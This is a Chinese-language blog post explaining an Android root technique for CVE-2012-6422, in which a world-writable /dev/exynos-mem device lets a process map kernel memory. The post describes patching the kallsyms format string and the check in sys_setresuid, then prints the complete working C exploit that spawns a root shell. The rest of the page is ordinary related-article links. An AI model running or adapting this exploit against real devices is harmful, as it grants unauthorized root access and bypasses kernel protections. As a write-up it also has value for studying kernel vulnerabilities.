让我们的Android ROOT,多一点套路。

一、简单套路

CVE-2012-6422的漏洞利用代码,展示了另一种提权方法。(见附录)

这也是一个mmap驱动接口校验导致映射任意内核地址的洞。将内核映射到用户进程空间后,使用setresuid(0, 0, 0)进行提权。

其步骤如下:

  1. 利用漏洞,映射内核到调用者进程空间
  2. 搜索内核,查找“%pK %c %s\n”,并Patch成“%p %c %s\n”
  3. 搜索内核,查找sys_setresuid符号地址
  4. 搜索sys_setresuid代码段,查找“0xe3500000” 并Patch为“0xe3500001”
  5. 用户态调用setresuid()提权
  6. 将前面2处Patch恢复原貌

二、详解

1)为什么搜索“%pK %c %s\n”

我们获得Linux的内核符号地址,一般首选读取/proc/kallsyms,但由于kptr_restrict的引入(/proc/sys/kernel/kptr_restrict),读到的内核符号地址一般是被抹掉的(0x00000000)。

查看内核实现,在执行$ cat /proc/kallsyms 时,对应内核代码为s_show()函数:

527 static int s_show(struct seq_file *m, void *p)
528 {
529 struct kallsym_iter *iter = m->private;
530
531 /* Some debugging symbols have no name. Ignore them. */
532 if (!iter->name[0])
533 return 0;
534
535 if (iter->module_name[0]) {
536 char type;
537
538 /*
539 * Label it "global" if it is exported,
540 * "local" if not exported.
541 */
542 type = iter->exported ? toupper(iter->type) :
543 tolower(iter->type);
544 seq_printf(m, "%pK %c %s\t[%s]\n", (void *)iter->value,
545 type, iter->name, iter->module_name);
546 } else
547 seq_printf(m, "%pK %c %s\n", (void *)iter->value,
548 iter->type, iter->name);
549 return 0;
550 }

我们在/proc/kallsyms中看到的3列值,是由下述代码生成:


547 seq_printf(m, "%pK %c %s\n", (void *)iter->value,
548 iter->type, iter->name);

其中%pK格式符会根据kptr_restrict值,选择是否显示符号地址,默认kptr_restrict值一般为1,即隐藏符号地址。只需要将K替换为空格,即可绕过此限制。

2)为什么要将sys_setresuid代码的“0xe3500000” Patch为“0xe3500001”

我们知道,如果成功调用setresuid(0, 0, 0),则会获得root权限,但成功执行此调用需要严格条件,具体描述下。

setresuid()被执行的条件有:

  1. 当前进程的euid是root

  2. 三个参数,每一个等于原来某个id中的一个

如果满足以上条件的任意一个,setresuid()都可以正常调用并执行,将进程的ID设置成对应的ID。

但显然,我们的提权程序不满足上述任何一个条件,那怎么办呢。看代码。

/*
* This function implements a generic ability to update ruid, euid,
* and suid. This allows you to implement the 4.4 compatible seteuid().
*/
asmlinkage long sys_setresuid(uid_t ruid, uid_t euid, uid_t suid)
{
int old_ruid = current->uid;
int old_euid = current->euid;
int old_suid = current->suid;
int retval; retval = security_task_setuid(ruid, euid, suid, LSM_SETID_RES);
if (retval)
return retval; if (!capable(CAP_SETUID)) {
if ((ruid != (uid_t) -1) && (ruid != current->uid) &&
(ruid != current->euid) && (ruid != current->suid))
return -EPERM;
if ((euid != (uid_t) -1) && (euid != current->uid) &&
(euid != current->euid) && (euid != current->suid))
return -EPERM;
if ((suid != (uid_t) -1) && (suid != current->uid) &&
(suid != current->euid) && (suid != current->suid))
return -EPERM;
}
if (ruid != (uid_t) -1) {
if (ruid != current->uid && set_user(ruid, euid != current->euid) < 0)
return -EAGAIN;
}
if (euid != (uid_t) -1) {
if (euid != current->euid)
{
current->mm->dumpable = 0;
wmb();
}
current->euid = euid;
}
current->fsuid = current->euid;
if (suid != (uid_t) -1)
current->suid = suid; return security_task_post_setuid(old_ruid, old_euid, old_suid, LSM_SETID_RES);
}

sys_setresuid()的逻辑很简单,首先调用 retval = security_task_setuid(ruid, euid, suid, LSM_SETID_RES); 设置实际用户ID,有效用户ID及保存的设置用户ID,如果成功,直接返回retval。

setresuid()有个性质,英文名称是all-or-nothing effect,意思是,如果setresuid()对某一个ID设置成功了,其他的失败了,比如只改变了ruid,suid和euid都改失败了,那么程序会将ruid改回原来的值,即保证要么三个ID都能成功修改,要么三个都没能修改成功。

我们只需要Patch掉下述代码,使其返回成功。

if (retval)
return retval;

而其对应的ARM汇编为:


cmp r0, #0

对应字节码为 0xE3500000,只需将其Patch成cmp r0, #1即可,即0xE3500001,所有进程的setresuid(0, 0, 0)都将成功执行,将当前进程提升到root权限。

ARM Opcodes查询可通过:http://armconverter.com

三、附录:CVE-2012-6422 exploit

/*
* exynos-mem device abuse by alephzain
*
* /dev/exynos-mem is present on GS3/GS2/GN2/MEIZU MX
*
* the device is R/W by all users :
* crw-rw-rw- 1 system graphics 1, 14 Dec 13 20:24 /dev/exynos-mem
*
*/ /*
* Abuse it for root shell
*/
#include <stdio.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <stdbool.h> #define PAGE_OFFSET 0xC0000000
#define PHYS_OFFSET 0x40000000 int main(int argc, char **argv, char **env) {
int fd, i, m, index, result; unsigned long *paddr = NULL;
unsigned long *tmp = NULL;
unsigned long *restore_ptr_fmt = NULL;
unsigned long *restore_ptr_setresuid = NULL;
unsigned long addr_sym; int page_size = sysconf(_SC_PAGE_SIZE);
int length = page_size * page_size; /* for root shell */
char *cmd[2];
cmd[0] = "/system/bin/sh";
cmd[1] = NULL; /* /proc/kallsyms parsing */
FILE *kallsyms = NULL;
char line [512];
char *ptr;
char *str; bool found = false; /* open the door */
fd = open("/dev/exynos-mem", O_RDWR);
if (fd == -1) {
printf("[!] Error opening /dev/exynos-mem\n");
exit(1);
} /* kernel reside at the start of physical memory, so take some Mb */
paddr = (unsigned long *)mmap(NULL, length, PROT_READ|PROT_WRITE, MAP_SHARED, fd, PHYS_OFFSET);
tmp = paddr;
if (paddr == MAP_FAILED) {
printf("[!] Error mmap: %s|%08X\n",strerror(errno), i);
exit(1);
} /*
* search the format string "%pK %c %s\n" in memory
* and replace "%pK" by "%p" to force display kernel
* symbols pointer
*/
for(m = 0; m < length; m += 4) {
if(*(unsigned long *)tmp == 0x204b7025
&& *(unsigned long *)(tmp+1) == 0x25206325
&& *(unsigned long *)(tmp+2) == 0x00000a73 ) {
printf("[*] s_show->seq_printf format string found at: 0x%08X\n", PAGE_OFFSET + m);
restore_ptr_fmt = tmp;
*(unsigned long*)tmp = 0x20207025;
found = true;
break;
}
tmp++;
} if (found == false) {
printf("[!] s_show->seq_printf format string not found\n");
exit(1);
} found = false; /* kallsyms now display symbols address */
kallsyms = fopen("/proc/kallsyms", "r");
if (kallsyms == NULL) {
printf("[!] kallsysms error: %s\n", strerror(errno));
exit(1);
} /* parse /proc/kallsyms to find sys_setresuid address */
while((ptr = fgets(line, 512, kallsyms))) {
str = strtok(ptr, " ");
addr_sym = strtoul(str, NULL, 16);
index = 1;
while(str) {
str = strtok(NULL, " ");
index++;
if (index == 3) {
if (strncmp("sys_setresuid\n", str, 14) == 0) {
printf("[*] sys_setresuid found at 0x%08X\n",addr_sym);
found = true;
}
break;
}
}
if (found) {
tmp = paddr;
tmp += (addr_sym - PAGE_OFFSET) >> 2;
for(m = 0; m < 128; m += 4) {
if (*(unsigned long *)tmp == 0xe3500000) {
printf("[*] patching sys_setresuid at 0x%08X\n",addr_sym+m);
restore_ptr_setresuid = tmp;
*(unsigned long *)tmp = 0xe3500001;
break;
}
tmp++;
}
break;
}
} fclose(kallsyms); /* to be sure memory is updated */
usleep(100000); /* ask for root */
result = setresuid(0, 0, 0); /* restore memory */
*(unsigned long *)restore_ptr_fmt = 0x204b7025;
*(unsigned long *)restore_ptr_setresuid = 0xe3500000;
munmap(paddr, length);
close(fd); if (result) {
printf("[!] set user root failed: %s\n", strerror(errno));
exit(1);
} /* execute a root shell */
execve (cmd[0], cmd, env); return 0;
}

Android内核sys_setresuid() Patch提权(CVE-2012-6422)的更多相关文章

  1. Linux内核通杀提权漏洞CVE-2016-5195验证

    一.漏洞简介 CVE-2016-5195这个漏洞是linux内核级的本地提权漏洞,原理是linux内核内存子系统在 处理私有只读存储映射的写入时复制机制发现了一个冲突条件.这个漏洞官方给出的影响范围是 ...

  2. Linux内核通杀提权漏洞CVE-2016-5195 - 内核升级方法

    如题,对于脏牛(Dirty COW)漏洞的修复方式已经在上篇文章中有介绍过如何验证,这里对如何升级内核给出修复建议. (注意:为避免不必要的生产风险的发生,请审核自己的实际环境而决定采用什么方法进行升 ...

  3. 一次绕过防火墙获取RCE以及提权到root权限的渗透过程

    本文是关于Apache struts2 CVE-2013-2251是由于导致执行远程命令的影响而被高度利用的漏洞.简而言之, 通过操纵以“action:”/”redirect:”/”redirectA ...

  4. Linux提权小结

    原文链接:http://zone.secevery.com/article/1104 Linux提权1.信息收集2.脏牛漏洞提权3.内核漏洞exp提权4.SUID提权 0x00 基础信息收集(1):内 ...

  5. linux 全自动提权 exp perl脚本

    linux 全自动提权 exp perl脚本 作者: admin 日期: 2013/01/19发表评论 (0) 查看评论   国外流传过来的 地址 http://dl.packetstormsecur ...

  6. windows提权的几种姿势

    想象这种画面:你拿到了一台机器上Meterpreter会话了,然后你准备运行 getsystem 命令进行提权,但如果提权没有成功,你就准备认输了吗?只有懦夫才会认输.但是你不是,对吗?你是一个勇者! ...

  7. 9.CVE-2016-5195(脏牛)内核提权漏洞分析

    漏洞描述: 漏洞编号:CVE-2016-5195 漏洞名称:脏牛(Dirty COW) 漏洞危害:低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权 影响范围:Linux内核>=2 ...

  8. android提权漏洞CVE-2010-EASY修复【转】

    本文转载自: http://blog.csdn.net/lhj0711010212/article/details/9351131 android提权漏洞CVE-2010-EASY修复   linux ...

  9. Linux本地内核提权漏洞复现(CVE-2019-13272)

    Linux本地内核提权漏洞复现(CVE-2019-13272) 一.漏洞描述 当调用PTRACE_TRACEME时,ptrace_link函数将获得对父进程凭据的RCU引用,然后将该指针指向get_c ...

随机推荐

  1. Cassandra内部架构

    Cassandra是一个开源的.分布式.无中心节点.弹性可扩展.高可用.容错.一致性协调.面向列的NoSQL数据库 Cassandra集群(Cluster) Cluster Data center(s ...

  2. 64位Ubuntu下配置CP-ABE环境

    CP-ABE环境配置 本文密码学专业,论文仿真需要CP-ABE,现将配置过程作个记录 cpabe依赖pbc,pbc依赖gmp,gmp依赖M4.bison.flex,所以.. sudo apt-get  ...

  3. pip安装报错处理+PyPi源切换教程

    一.pip安装出错类型 1.1 pip版本过旧导致不能安装 报错提示: You are using pip version 9.0.3, however version 10.0.1 is avail ...

  4. Linux确认网口对应配置文件

    服务器经常是多网卡多网口,我们在某个网口插上网线后,到/etc/sysconfig/network-scripts/下配置ip时需要确定插上网线的网口对应的是哪个配置文件(比如是eth0还是eth1) ...

  5. Oracle修改监听端口教程

    Oracle默认监听端口1521,一众扫描器通常通过探测1521端口是否开启来探测是否存在Oracle服务,如果修改默认监听端口在一定程度上可以提升数据库和主机的安全性. 比如这里我们修改成2521为 ...

  6. Mockito:一个强大的用于Java开发的模拟测试框架

    https://blog.csdn.net/zhoudaxia/article/details/33056093 介绍 本文将介绍模拟测试框架Mockito的一些基础概念, 介绍该框架的优点,讲解应用 ...

  7. samba服务断开某个用户 samba客户端断开自动登录

    结论: 方式二成功率更高,方式一有时候会失败. 方式一:windows命令行 删除链接 1. net use 查看连接情况 2. net use * /del 3. 如果不行 重启电脑 方式二: 删除 ...

  8. windows下的pycharm配置 linux环境

    由于最近学习python的需要,为了方便程序的调试,尝试在Windows下的Pycharm远程连接到虚拟机中Centos下的python环境.(这里我采用的是ssh的远程连接)1.准备工作: 固定ce ...

  9. Json使用示例

    使用Json,可以下载如下所示的6个Jar包 整个工程目录结构如下: 简单的用法: package json; import net.sf.json.JSONArray; import net.sf. ...

  10. 二. Python基础(2)--语法

    二. Python基础(2)--语法 1.实现一个简单的登录系统 '''# 形式1 n = 1 while n < 4:     name = input("请输入姓名\n" ...